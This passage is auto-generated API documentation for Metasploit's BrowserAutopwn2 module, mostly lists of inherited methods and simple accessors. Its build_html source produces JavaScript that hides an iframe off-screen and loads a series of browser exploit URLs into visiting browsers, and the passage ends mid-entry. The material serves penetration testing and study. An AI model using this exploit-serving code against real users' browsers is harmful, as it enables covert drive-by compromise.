href="HttpServer/HTML.html#js_os_detect-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_os_detect (method)">#js_os_detect</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#js_property_spray-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#js_property_spray (method)">#js_property_spray</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#obfuscate_js-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#obfuscate_js (method)">#obfuscate_js</a></span>, <span class='object_link'><a href="HttpServer/HTML.html#send_response_html-instance_method" title="Msf::Exploit::Remote::HttpServer::HTML#send_response_html (method)">#send_response_html</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="HttpServer.html#add_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_resource (method)">#add_resource</a></span>, <span class='object_link'><a href="HttpServer.html#add_robots_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#add_robots_resource (method)">#add_robots_resource</a></span>, <span class='object_link'><a href="HttpServer.html#autofilter-instance_method" title="Msf::Exploit::Remote::HttpServer#autofilter (method)">#autofilter</a></span>, <span class='object_link'><a href="HttpServer.html#check_dependencies-instance_method" title="Msf::Exploit::Remote::HttpServer#check_dependencies (method)">#check_dependencies</a></span>, <span class='object_link'><a href="HttpServer.html#cli-instance_method" title="Msf::Exploit::Remote::HttpServer#cli (method)">#cli</a></span>, <span class='object_link'><a href="HttpServer.html#cli=-instance_method" title="Msf::Exploit::Remote::HttpServer#cli= (method)">#cli=</a></span>, <span class='object_link'><a href="HttpServer.html#close_client-instance_method" title="Msf::Exploit::Remote::HttpServer#close_client (method)">#close_client</a></span>, <span class='object_link'><a href="HttpServer.html#create_response-instance_method" title="Msf::Exploit::Remote::HttpServer#create_response (method)">#create_response</a></span>, <span class='object_link'><a href="HttpServer.html#fingerprint_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#fingerprint_user_agent (method)">#fingerprint_user_agent</a></span>, <span class='object_link'><a href="HttpServer.html#get_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#get_resource (method)">#get_resource</a></span>, <span class='object_link'><a href="HttpServer.html#get_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#get_uri (method)">#get_uri</a></span>, <span class='object_link'><a href="HttpServer.html#hardcoded_uripath-instance_method" title="Msf::Exploit::Remote::HttpServer#hardcoded_uripath (method)">#hardcoded_uripath</a></span>, <span class='object_link'><a href="HttpServer.html#initialize-instance_method" title="Msf::Exploit::Remote::HttpServer#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="HttpServer.html#print_prefix-instance_method" title="Msf::Exploit::Remote::HttpServer#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="HttpServer.html#random_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#random_uri (method)">#random_uri</a></span>, <span class='object_link'><a href="HttpServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::HttpServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="HttpServer.html#remove_resource-instance_method" title="Msf::Exploit::Remote::HttpServer#remove_resource (method)">#remove_resource</a></span>, <span class='object_link'><a href="HttpServer.html#report_user_agent-instance_method" title="Msf::Exploit::Remote::HttpServer#report_user_agent (method)">#report_user_agent</a></span>, <span class='object_link'><a href="HttpServer.html#resource_uri-instance_method" title="Msf::Exploit::Remote::HttpServer#resource_uri (method)">#resource_uri</a></span>, <span class='object_link'><a href="HttpServer.html#send_local_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_local_redirect (method)">#send_local_redirect</a></span>, <span class='object_link'><a href="HttpServer.html#send_not_found-instance_method" title="Msf::Exploit::Remote::HttpServer#send_not_found (method)">#send_not_found</a></span>, <span class='object_link'><a href="HttpServer.html#send_redirect-instance_method" title="Msf::Exploit::Remote::HttpServer#send_redirect (method)">#send_redirect</a></span>, <span class='object_link'><a href="HttpServer.html#send_response-instance_method" title="Msf::Exploit::Remote::HttpServer#send_response (method)">#send_response</a></span>, <span class='object_link'><a href="HttpServer.html#send_robots-instance_method" title="Msf::Exploit::Remote::HttpServer#send_robots (method)">#send_robots</a></span>, <span class='object_link'><a href="HttpServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::HttpServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="HttpServer.html#srvport-instance_method" title="Msf::Exploit::Remote::HttpServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="HttpServer.html#use_zlib-instance_method" title="Msf::Exploit::Remote::HttpServer#use_zlib (method)">#use_zlib</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_web_form (method)">#report_web_form</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_page-instance_method" title="Msf::Auxiliary::Report#report_web_page (method)">#report_web_page</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_site-instance_method" title="Msf::Auxiliary::Report#report_web_site (method)">#report_web_site</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_vuln-instance_method" title="Msf::Auxiliary::Report#report_web_vuln (method)">#report_web_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#store_cred-instance_method" title="Msf::Auxiliary::Report#store_cred (method)">#store_cred</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#store_local-instance_method" title="Msf::Auxiliary::Report#store_local (method)">#store_local</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#store_loot-instance_method" title="Msf::Auxiliary::Report#store_loot (method)">#store_loot</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="TcpServer.html" title="Msf::Exploit::Remote::TcpServer (module)">TcpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="TcpServer.html#initialize-instance_method" title="Msf::Exploit::Remote::TcpServer#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="TcpServer.html#on_client_close-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_close (method)">#on_client_close</a></span>, <span class='object_link'><a href="TcpServer.html#on_client_connect-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_connect (method)">#on_client_connect</a></span>, <span class='object_link'><a href="TcpServer.html#ssl-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_cert-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cert (method)">#ssl_cert</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_compression-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_compression (method)">#ssl_compression</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_version-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_version (method)">#ssl_version</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="SocketServer.html#_determine_server_comm-instance_method" title="Msf::Exploit::Remote::SocketServer#_determine_server_comm (method)">#_determine_server_comm</a></span>, <span class='object_link'><a href="SocketServer.html#bindhost-instance_method" title="Msf::Exploit::Remote::SocketServer#bindhost (method)">#bindhost</a></span>, <span class='object_link'><a href="SocketServer.html#bindport-instance_method" title="Msf::Exploit::Remote::SocketServer#bindport (method)">#bindport</a></span>, <span class='object_link'><a href="SocketServer.html#cleanup_service-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup_service (method)">#cleanup_service</a></span>, <span class='object_link'><a href="SocketServer.html#exploit-instance_method" title="Msf::Exploit::Remote::SocketServer#exploit (method)">#exploit</a></span>, <span class='object_link'><a href="SocketServer.html#initialize-instance_method" title="Msf::Exploit::Remote::SocketServer#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="SocketServer.html#on_client_data-instance_method" title="Msf::Exploit::Remote::SocketServer#on_client_data (method)">#on_client_data</a></span>, <span class='object_link'><a href="SocketServer.html#primer-instance_method" title="Msf::Exploit::Remote::SocketServer#primer (method)">#primer</a></span>, <span class='object_link'><a href="SocketServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::SocketServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="SocketServer.html#srvhost-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost (method)">#srvhost</a></span>, <span class='object_link'><a href="SocketServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="SocketServer.html#srvport-instance_method" title="Msf::Exploit::Remote::SocketServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="SocketServer.html#via_string-instance_method" title="Msf::Exploit::Remote::SocketServer#via_string (method)">#via_string</a></span></p>
<div id="instance_attr_details" class="attr_details">
<h2>Instance Attribute Details</h2>
<span id=""></span>
<div class="method_details first">
<h3 class="signature first" id="bap_exploits-instance_method">
#<strong>bap_exploits</strong> &#x21d2; <tt>Array</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns A list of initialized BAP exploits.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>A list of initialized BAP exploits</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
17
18
19</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 17</span>
<span class='kw'>def</span> <span class='id identifier rubyid_bap_exploits'>bap_exploits</span>
<span class='ivar'>@bap_exploits</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id=""></span>
<div class="method_details ">
<h3 class="signature " id="exploit_job_ids-instance_method">
#<strong>exploit_job_ids</strong> &#x21d2; <tt>Array</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns A list of exploit job IDs.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>A list of exploit job IDs</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
20
21
22</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 20</span>
<span class='kw'>def</span> <span class='id identifier rubyid_exploit_job_ids'>exploit_job_ids</span>
<span class='ivar'>@exploit_job_ids</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id=""></span>
<div class="method_details ">
<h3 class="signature " id="payload_job_ids-instance_method">
#<strong>payload_job_ids</strong> &#x21d2; <tt>Array</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns A list of payload job IDs.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>A list of payload job IDs</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
23
24
25</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 23</span>
<span class='kw'>def</span> <span class='id identifier rubyid_payload_job_ids'>payload_job_ids</span>
<span class='ivar'>@payload_job_ids</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id=""></span>
<div class="method_details ">
<h3 class="signature " id="wanted_payloads-instance_method">
#<strong>wanted_payloads</strong> &#x21d2; <tt>Array</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns Wanted payloads.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>Wanted payloads.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
26
27
28</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 26</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wanted_payloads'>wanted_payloads</span>
<span class='ivar'>@wanted_payloads</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="assign_module_resource-instance_method">
#<strong>assign_module_resource</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a unique resource path.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A unique resource path.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
172
173
174
175
176
177
178
179
180</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 172</span>
<span class='kw'>def</span> <span class='id identifier rubyid_assign_module_resource'>assign_module_resource</span>
<span class='id identifier rubyid_resource'>resource</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>while</span>
<span class='id identifier rubyid_resource'>resource</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>10</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='int'>4</span><span class='rparen'>)</span>
<span class='kw'>break</span> <span class='kw'>unless</span> <span class='id identifier rubyid_is_resource_taken?'>is_resource_taken?</span><span class='lparen'>(</span><span class='id identifier rubyid_resource'>resource</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_resource'>resource</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="browser_profile_prefix-instance_method">
#<strong>browser_profile_prefix</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a prefix type thats unique to this BAP (based on a timestamp &amp; module uuid). This overrides Msf::Exploit::Remote::BrowserProfileManager#browser_profile_prefix so that BAP and all of its child exploits can share target information with each other. If BAP is active but there are other standalone BES exploits running, this allows them not to use (or cleanup) each others data. Also, once requested, the method will not generate another profile prefix again, it will just return whatevers been stored in the @browser_profile_prefix instance variable.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
79
80
81</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 79</span>
<span class='kw'>def</span> <span class='id identifier rubyid_browser_profile_prefix'>browser_profile_prefix</span>
<span class='ivar'>@browser_profile_prefix</span> <span class='op'>||=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>BAP.</span><span class='embexpr_beg'>#{</span><span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_uuid'>uuid</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="build_html-instance_method">
#<strong>build_html</strong>(cli, request) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the HTML that serves our exploits.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>HTML</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 743</span>
<span class='kw'>def</span> <span class='id identifier rubyid_build_html'>build_html</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='id identifier rubyid_exploit_list'>exploit_list</span> <span class='op'>=</span> <span class='id identifier rubyid_get_exploit_urls'>get_exploit_urls</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MaxSessionCount</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>&gt;</span> <span class='op'>-</span><span class='int'>1</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session_count'>session_count</span> <span class='op'>&gt;=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MaxSessionCount</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Exploits will not be served because you&#39;ve reached the max session count of </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MaxSessionCount</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HTMLContent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>else</span>
<span class='kw'>return</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HTMLContent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_exploit_list'>exploit_list</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>No suitable exploits to send for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HTMLContent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>else</span>
<span class='kw'>return</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HTMLContent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='comment'># Some Flash exploits don&#39;t seem to work well with a hidden iframe.
</span> <span class='id identifier rubyid_js'>js</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
var exploitList = [</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_exploit_list'>exploit_list</span><span class='period'>.</span><span class='id identifier rubyid_map!'>map!</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_e'>e</span><span class='op'>|</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rbrace'>}</span> <span class='op'>*</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>, </span><span class='tstring_end'>&quot;</span></span><span class='embexpr_end'>}</span><span class='tstring_content'>];
function setElementStyle(e, opts) {
if (typeof e.style.setAttribute == &#39;undefined&#39;) {
var attributeString = &#39;&#39;;
for (var key in opts) { attributeString += key + &quot;:&quot; + opts[key] + &quot;;&quot; }
e.setAttribute(&quot;style&quot;, attributeString);
} else {
for (var key in opts) {
e.style.setAttribute(key, opts[key]);
}
}
}
function moveIframe(e) {
var opts = {
&#39;position&#39;: &#39;absolute&#39;,
&#39;left&#39;: screen.width * -screen.width
}
setElementStyle(e, opts);
}
window.onload = function() {
var e = document.createElement(&quot;iframe&quot;);
e.setAttribute(&quot;id&quot;, &quot;myiframe&quot;);
moveIframe(e);
document.body.appendChild(e);
loadExploit();
}
function loadExploit() {
var e = document.getElementById(&quot;myiframe&quot;);
var firstUri = exploitList.splice(0, 1);
if (firstUri != &#39;&#39;) {
e.setAttribute(&quot;src&quot;, firstUri);
setTimeout(&quot;loadExploit()&quot;, </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ExploitReloadTimeout</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
}
}
</span><span class='tstring_end'>|</span></span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;cache-control&quot; content=&quot;no-cache&quot; /&gt;
&lt;script&gt;
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_js'>js</span><span class='embexpr_end'>}</span><span class='tstring_content'>
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HTMLContent</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="cleanup-instance_method">
#<strong>cleanup</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Cleans up everything such as profiles and jobs.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">See Also:</p>
<ul class="see">
